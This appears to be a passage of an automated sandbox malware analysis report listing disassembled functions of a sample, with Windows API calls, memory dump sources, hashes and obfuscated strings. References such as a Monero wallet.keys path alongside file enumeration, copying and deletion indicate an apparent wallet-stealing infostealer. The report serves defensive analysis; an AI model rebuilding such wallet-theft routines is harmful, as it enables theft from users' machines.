                              • StrCmpCA.SHLWAPI(?,004D5304), ref: 004B1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004B1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 004B1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004B1E20
                              • FindClose.KERNEL32(000000FF), ref: 004B1E32
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 1000e35da70bb787435d0af9c0f669fa655784c868dfaaa20b3e9349381c087c
                              • Instruction ID: 9e6909f2dafbbcc5c01a0684521dc48e134e91f40ec31f868d857de736383374
                              • Opcode Fuzzy Hash: 1000e35da70bb787435d0af9c0f669fa655784c868dfaaa20b3e9349381c087c
                              • Instruction Fuzzy Hash: 72121E7591011C9BCB55FB61DCA6FEE7338AF14308F40459EA10A62091EF386F99CBB9
                              Function 004BDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004D0C2E), ref: 004BDE5E
                              • StrCmpCA.SHLWAPI(?,004D14C8), ref: 004BDEAE
                              • StrCmpCA.SHLWAPI(?,004D14CC), ref: 004BDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BE3E0
                              • FindClose.KERNEL32(000000FF), ref: 004BE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 72292792ad932214760f1f57b755d2529d7b46ca0e6ee465384f3d1384ff7c5d
                              • Instruction ID: ec04c88f05f59349d0a0ac9f14cbb6034551f2264c5e439e1ab7e04d2f9bde00
                              • Opcode Fuzzy Hash: 72292792ad932214760f1f57b755d2529d7b46ca0e6ee465384f3d1384ff7c5d
                              • Instruction Fuzzy Hash: D5F1BC7581011C9BCB65FB61DC96FEE7338AF14308F5041AFA40A62091EE386F5ACE79
                              Function 004BDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004D14B0,004D0C2A), ref: 004BDAEB
                              • StrCmpCA.SHLWAPI(?,004D14B4), ref: 004BDB33
                              • StrCmpCA.SHLWAPI(?,004D14B8), ref: 004BDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BDDCC
                              • FindClose.KERNEL32(000000FF), ref: 004BDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: a0c70e5d706dec39baeeb5de7228e6b704b2ac6850c620324e60a372358b6d47
                              • Instruction ID: c6dee0537b31aa694540e7f37f3bcbcfcf7e4d183cc6536608e97414b0df1745
                              • Opcode Fuzzy Hash: a0c70e5d706dec39baeeb5de7228e6b704b2ac6850c620324e60a372358b6d47
                              • Instruction Fuzzy Hash: 5191487690010867CB54FBB1DC56EFD737DAB84308F40856EF80A96151EE389B19CBB6
                              Function 0087E119 Relevance: 11.7, Strings: 8, Instructions: 1696COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7%w$AX?5$Rw_$XJY#$g~$yL;W$\p$qz
                              • API String ID: 0-3148951601
                              • Opcode ID: 2e2d9d3daab81b37f1548a859a0ddecec8eb006ba4474ae9d83f3b5fbfab4b8c
                              • Instruction ID: 18468d4fae503cd649ceb9e265ff49597da48d153f222b48eeaaaa1544c26e14
                              • Opcode Fuzzy Hash: 2e2d9d3daab81b37f1548a859a0ddecec8eb006ba4474ae9d83f3b5fbfab4b8c
                              • Instruction Fuzzy Hash: 87B24BF3A082049FE7046E2DEC8567AB7EAEFD4320F1A863DE6C4C7744E93558018696
                              Function 004C7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,004D05AF), ref: 004C7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004C7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 004C7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004C7C62
                              • LocalFree.KERNEL32(00000000), ref: 004C7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: ba928fe9a4c6ae522495139e508be80820af5644d3f6f2ed45fb73749b54f3ab
                              • Instruction ID: 69d891f36c7d67e4810c550f482a6a0760dffc23ec41eee0d4d228ffb6247853
                              • Opcode Fuzzy Hash: ba928fe9a4c6ae522495139e508be80820af5644d3f6f2ed45fb73749b54f3ab
                              • Instruction Fuzzy Hash: 46414C7590021CABCB64DB95DC99FEEB374FB44704F20419EE40A62280DB782F85CFA5
                              Function 00878EBB Relevance: 10.4, Strings: 7, Instructions: 1652COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: __$?Cf$Ep?$OLQ$]BJK$bVX$z
                              • API String ID: 0-3238819472
                              • Opcode ID: b55135db650a3323688c6a3ec699eedd81620ff78cb49739c533acc45702d8d6
                              • Instruction ID: 53ea40e525d8e58fb681414e59dc90ac6050d848ea9009dca46849d22e53d771
                              • Opcode Fuzzy Hash: b55135db650a3323688c6a3ec699eedd81620ff78cb49739c533acc45702d8d6
                              • Instruction Fuzzy Hash: FAB229F3A0C2049FE3046E2DEC8567ABBE9EFD4720F1A853DEAC4C7744E93558058696
                              Function 0088EF2B Relevance: 10.3, Strings: 7, Instructions: 1578COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: >5{$37/w$\[wj$d&?$h#q_$vJo[$vJo[
                              • API String ID: 0-2007659027
                              • Opcode ID: 399585b40bfd27ef25ae43e09777b3854cd8117ca875c3e107005bfc25caff17
                              • Instruction ID: 86f0844655009e2cc3fbaded378003889df824de9241405c6dcb336a0afb05fd
                              • Opcode Fuzzy Hash: 399585b40bfd27ef25ae43e09777b3854cd8117ca875c3e107005bfc25caff17
                              • Instruction Fuzzy Hash: 81B2E5F390C214AFE7046E2DEC4577ABBE9EF94760F1A493DEAC4C3744E63558008696
                              Function 004BE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,004D0D73), ref: 004BE4A2
                              • StrCmpCA.SHLWAPI(?,004D14F8), ref: 004BE4F2
                              • StrCmpCA.SHLWAPI(?,004D14FC), ref: 004BE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 27d85a8cf7c21b71b9cd5e6c1c9d9b087ab7732f54d848936841c9ded83de7de
                              • Instruction ID: cf4513a0aa1d7068fcb1ec2fcb60005244b175f2063ecee5e0c0e6d2c070766f
                              • Opcode Fuzzy Hash: 27d85a8cf7c21b71b9cd5e6c1c9d9b087ab7732f54d848936841c9ded83de7de
                              • Instruction Fuzzy Hash: 0912707590010C9BCB54FB61DCA6FED7338AF5430CF4045AEA50A92191EE386F59CBBA
                              Function 004B9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,004B4EEE,00000000,?), ref: 004B9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9B2A
                              • LocalFree.KERNEL32(?,?,?,?,004B4EEE,00000000,?), ref: 004B9B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: NK
                              • API String ID: 4291131564-1808100879
                              • Opcode ID: e417d190d2044a775c7be08bec3e11daa2be6ba4502b5f34dd863c1ae4d0aae7
                              • Instruction ID: 4fd29ca9ca871600bda1da59de06fcadf62647d337cf2cb8f7de5cf573cf47b0
                              • Opcode Fuzzy Hash: e417d190d2044a775c7be08bec3e11daa2be6ba4502b5f34dd863c1ae4d0aae7
                              • Instruction Fuzzy Hash: 8311A4B4240308AFEB10CFA4DC95FAA77B5FB89700F208059FA199B390C7B5A901CB54
                              Function 0087C6F2 Relevance: 7.8, Strings: 5, Instructions: 1571COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *Qu/$,jo$pr?$-w{$?ww
                              • API String ID: 0-3577636421
                              • Opcode ID: 69c16cc5d23ddcc84ce4f17da7304651a22becffe108200f7c46a8e308beb346
                              • Instruction ID: c29747febfec9dafe1f37f98d6d2e88f7826a9edd6daf9a9309440c93f9843e7
                              • Opcode Fuzzy Hash: 69c16cc5d23ddcc84ce4f17da7304651a22becffe108200f7c46a8e308beb346
                              • Instruction Fuzzy Hash: B0B205F360C6049FE304AE2DEC8567ABBE5EF94320F1A493DEAC5C3744EA3558058697
                              Function 004BC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004BC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004BC87C
                              • lstrcat.KERNEL32(?,004D0B46), ref: 004BC943
                              • lstrcat.KERNEL32(?,004D0B47), ref: 004BC957
                              • lstrcat.KERNEL32(?,004D0B4E), ref: 004BC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
